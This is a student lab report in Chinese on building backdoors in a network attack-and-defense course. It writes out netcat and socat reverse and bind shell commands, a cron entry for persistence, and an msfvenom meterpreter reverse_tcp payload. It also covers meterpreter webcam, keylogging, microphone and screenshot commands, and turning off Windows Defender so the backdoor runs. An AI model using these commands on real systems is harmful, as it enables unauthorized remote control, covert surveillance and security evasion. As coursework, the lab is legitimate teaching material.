2018-2019-2 20165219《网络对抗技术》Exp2 后门原理与实践

实验内容

使用netcat获取主机操作Shell，cron启动

使用Socat获取主机操作Shell, 任务计划启动

使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

常用后门工具

Netcat参考资料

Socat参考资料

基础问题

例举你能想到的一个后门进入到你系统中的可能方式？

答：收到虚假邮件，下载邮件的附件

例举你知道的后门如何启动起来(win及linux)的方式？

答：通过修改注册表设置为开机自启动；进入挂马网站

Meterpreter有哪些给你映像深刻的功能？

答：开启摄像头，录制音频等操作。

如何发现自己有系统有没有被安装后门？

答：开启防火墙；下载专业的杀毒软件

实验过程

一 windows下获得一个linux shell

1 在Linux中使用ifconfig查看Linux的ip地址

2 在Windows中使用ipconfig查看本机ip地址

3 windowsncatexe -l -p 5219打开监听，Linuxnc ip 5219 -e /bin/sh反弹连接win，并且在Windows cmd查看是否成功

二 Linux 下获得Windows的cmd程序

1 Linux运行监听指令nc -l -p 5219

2 Windows反弹连接Linuxncat.exe -e cmd.exe ip 5219

3 在Linux shell下使用dir命令

三在Linux与Windows之间进行数据传送

1 在windows下输入命令：ncat.exe -l 5219，实现监听5219端口

2 Kali下输入ncat ip，连接到windows端口

四使用netcat获取主机操作Shell，cron启动

1 windows端下，输入命令ncat.exe -l -p 5219，监听本机的5219端口

2 kali端下，输入crontab -e，实现编辑一条定时任务。

3 插入* * * * /bin/netcat ip -e /bin/sh

4 保存退出，crontab -l查看

五使用socat获取主机操作Shell, 任务计划启动

1 win10系统中鼠标右击计算机：计算机管理->系统工具->任务计划程序->创建任务

2 填写任务名称：20165219

3 新建触发器

4 新建操作

5 导入socat.exe的路径，并添加参数：tcp-listen:5219 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5219，同时把cmd.exe的stderr重定向到stdout上)

6 锁定计算机，再次打开，运行任务。

7 在Linux shell中输入socat - tcp:ip:5219

六使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1 kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=5219 -f exe > 20165219_backdoor.exe

2 Windows中使用ncat.exe -lv5219 > 20165219_backdoor.exe

3 Linux中输入nc ip < 20165219_backdoor.exe
在ncat文件夹下查看

4 使用msfconsole进入msf控制台

5 进行一系列的设置

6 运行后门程序

七使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1webcam_snap可以使用摄像头拍照

2 使用creenshot可以进行截屏

3 keyscan_start 记录下击键的过程

4 record_mic可以截获一段音频

八遇到的问题

运行后门程序的时候， cMd拒绝访问，双击文件也不可以运行，关掉防火墙也不行。

解决：把win10 控制面板中的 windows defender安全中心中的病毒威胁和防护功能关掉

九实验体会

通过这次实验明白了后门的原理。同时也增强了安全防护的意识，实验内容很有趣。